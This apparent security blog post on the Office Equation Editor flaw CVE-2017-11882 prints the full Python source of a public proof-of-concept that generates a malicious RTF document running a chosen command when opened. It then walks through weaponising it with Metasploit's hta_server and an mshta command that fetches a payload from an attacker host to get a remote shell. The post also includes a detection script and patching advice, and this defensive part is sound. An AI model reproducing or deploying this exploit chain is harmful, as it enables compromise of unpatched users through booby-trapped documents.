PoC sample now available for the Office remote code execution vulnerability
CVE-2017-11882 has been quite hot lately. For background on the vulnerability see: https://www.77169.com/html/186186.html
Today I saw someone share a PoC on Twitter, https://twitter.com/gossithedog/status/932694287480913920, http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/, and later saw another shared project, https://github.com/embedi/CVE-2017-11882. After a quick look at that project: it achieves command execution by modifying an RTF file. This CVE-2017-11882 exploit for the latest Office is flawless: no pop-up window, ignores macros, affects all Office versions. The trigger uses the WebClient service to launch and execute a remote file from an attacker-controlled WebDAV server. The script creates a simple document using several OLE objects. These objects exploit CVE-2017-11882, resulting in consecutive command execution. The specific project address is as follows:
PoC address: https://github.com/Ridter/CVE-2017-11882/
PoC source code:
# Python 2 script (print statements, str.encode("hex"), str.translate with a deletion table)
import argparse
import sys


# Minimal RTF document wrapper
RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""


RTF_TRAILER = R"""\par}
"""


# Embedded OLE object of class Equation.3; \objupdate forces the object to be updated when displayed
OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """


OBJECT_TRAILER = R"""
}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
"""


# Hex-encoded OLE compound document template (Equation Native stream); the command is spliced in at COMMAND_OFFSET
OBJDATA_TEMPLATE = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""


# Offset into the hex string (two hex characters per byte) where the command is written
COMMAND_OFFSET = 0x949*2


def create_ole_exec_primitive(command):
    if len(command) > 43:
        print "[!] Primitive command must be shorter than 43 bytes"
        sys.exit(0)
    hex_command = command.encode("hex")
    # Drop line breaks so the template becomes one continuous hex stream
    objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
    ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER



def create_rtf(header,command,trailer):
    ole1 = create_ole_exec_primitive(command + " &")

    # We need 2 or more commands for executing remote file from WebDAV
    # because WebClient service start may take some time
    return header + ole1 + trailer



if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
    parser.add_argument("-c", "--command", help="Command to execute.", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

    args = parser.parse_args()

    rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)

    output_file = open(args.output, "w")
    output_file.write(rtf_content)

    print "[*] Done ! output file --> " + args.output
Reproduction:
Usage is simple: the malicious doc file is generated by running a command. First, a quick test of whether it can pop the calculator, using the following command:
python python.py -c "cmd.exe /c calc.exe" -o 1.doc, and then:
The file 1.doc is generated accordingly. When I open 1.doc, the following prompt appears:
After clicking Allow:
the calculator launches automatically. Since the pop-up works, we can construct a PowerShell command to obtain an MSF session directly.
Further exploitation
Before exploiting, a word about HTA. An HTA file uses HTML format, and its code can be edited and inspected just like HTML. VBScript and JavaScript code can be freely mixed in an HTA file. Although an HTA is written in HTML, JS and CSS, it has far more privileges than an ordinary web page: it has all the privileges of a desktop application (reading and writing files, manipulating the registry, and so on). HTA was designed to be a desktop application in the first place.
During reproduction I noticed that HTA is used for command execution, so I guessed the attacking machine serves as hta_server and tried searching msf for hta; I found a module whose effect is the same as PS_shell. The demonstration follows:
1. Search msf for the hta_server module, use it, set the relevant parameters, and run exploit -j:
2. On the attacking machine, generate the doc file with the script:
python python.py -c "mshta http://192.168.1.115:8080/test" -o test2.doc
3. Open the doc file on the test machine; the test machine checks in normally:
The attack succeeded; at this point the experiment with this module returned a shell. I then switched to a Win7 + Office 2007 environment and also got a shell.
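As an added triage example (not code from the post or from the Ridter project), the script below turns the PoC's own layout into a detector: it finds embedded Equation.3 objects in an RTF, decodes their \objdata hex, reads the bytes at the PoC's command offset (0x949*2 in hex text, i.e. byte 0x949), and flags the binaries the post says AV products intercept. The build_sample helper only constructs a zero-filled test document in the PoC's RTF wrapper for offline checking; it is not a working exploit, and the 44-byte field length is an assumption (the PoC's 43-byte limit plus one).

```python
import re

# Byte offset of the command field in the decoded \objdata stream: the PoC's
# COMMAND_OFFSET = 0x949*2 indexes hex text, so the byte offset is 0x949.
COMMAND_BYTE_OFFSET = 0x949
FIELD_LEN = 44   # assumption: the PoC's 43-byte maximum plus one byte
# Binaries the post says AV products intercept; flagged if seen in the field.
SUSPICIOUS_BINARIES = ("mshta", "cmd.exe", "powershell", "rundll32")
# One embedded object: from "{\object" to the closing brace of its \objdata hex.
OBJECT_RE = re.compile(
    r"\{\\object(?P<ctl>[^{]*)\{\\\*\\objclass\s+Equation\.3\}"
    r".*?\{\\\*\\objdata\s*(?P<hex>[0-9a-fA-F\s]+)\}", re.DOTALL)

def _printable_prefix(data):
    """ASCII run at the start of data, ending at the first NUL or control byte."""
    out = []
    for b in data:
        if not 0x20 <= b < 0x7F:
            break
        out.append(chr(b))
    return "".join(out)

def scan_rtf(rtf_text):
    """Triage an RTF document: one dict per embedded Equation.3 object."""
    findings = []
    for m in OBJECT_RE.finditer(rtf_text):
        try:
            blob = bytes.fromhex(re.sub(r"\s", "", m.group("hex")))
        except ValueError:  # odd-length or otherwise malformed hex
            continue
        # The PoC template pads this field with 'A' bytes; padding may trail the command.
        command = _printable_prefix(blob[COMMAND_BYTE_OFFSET:COMMAND_BYTE_OFFSET + FIELD_LEN])
        findings.append({
            "command_field": command,
            # \objupdate asks Word to update (activate) the object when it is displayed.
            "objupdate": "\\objupdate" in m.group("ctl"),
            "suspicious": any(n in command.lower() for n in SUSPICIOUS_BINARIES),
        })
    return findings

def build_sample(command):
    """Constructed test document, not a working exploit: zero-filled stream with
    'A' padding and the command at the PoC's offset, in the PoC's RTF wrapper."""
    stream = bytearray(COMMAND_BYTE_OFFSET + 64)
    stream[COMMAND_BYTE_OFFSET:COMMAND_BYTE_OFFSET + FIELD_LEN] = b"A" * FIELD_LEN
    stream[COMMAND_BYTE_OFFSET:COMMAND_BYTE_OFFSET + len(command)] = command.encode()
    return ("{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260"
            "{\\*\\objdata " + stream.hex() + "\n}{\\result {\\pict}}}\\par}")
```

Run scan_rtf over the text of a suspect RTF; a non-empty command_field containing one of the listed binaries, together with objupdate set, matches the pattern both commands in this post produce.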
Office documents are in everyday use, so people do not pay much attention when viewing doc and similar files. But when the Office software itself has a vulnerability, such documents become a hacker's tool.
Defence:
Microsoft has already released a security patch; download Microsoft's patch for this vulnerability here:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
Install the patch to fix the vulnerability and enable automatic updates. In addition, most antivirus products have taken defensive measures: in testing, some of them directly intercept commands executed via mshta, rundll32 and powershell and warn the user that this is a suspicious operation.
In the APT field this vulnerability is a god-tier bug, it is that convenient to exploit. For users, what needs doing is not only patching promptly and installing antivirus software, but also raising security awareness: knowing how this vulnerability is used in real scenarios lets you respond in a targeted way. In APT operations this kind of vulnerability is usually combined with social engineering; common tricks include phishing emails (with the document as an attachment), chat software (gaining your trust and luring you into opening the document), and uploading malicious documents to websites you visit frequently. If your system is not updated to the latest patch or has no antivirus installed, try not to open documents sent by others; once one runs, for an individual it means a personal computer compromise, and if you are in an enterprise, your company's security is in serious jeopardy.
This technical write-up is for personal testing, verification and learning only; please do not use it for any illegal purpose. Thank you!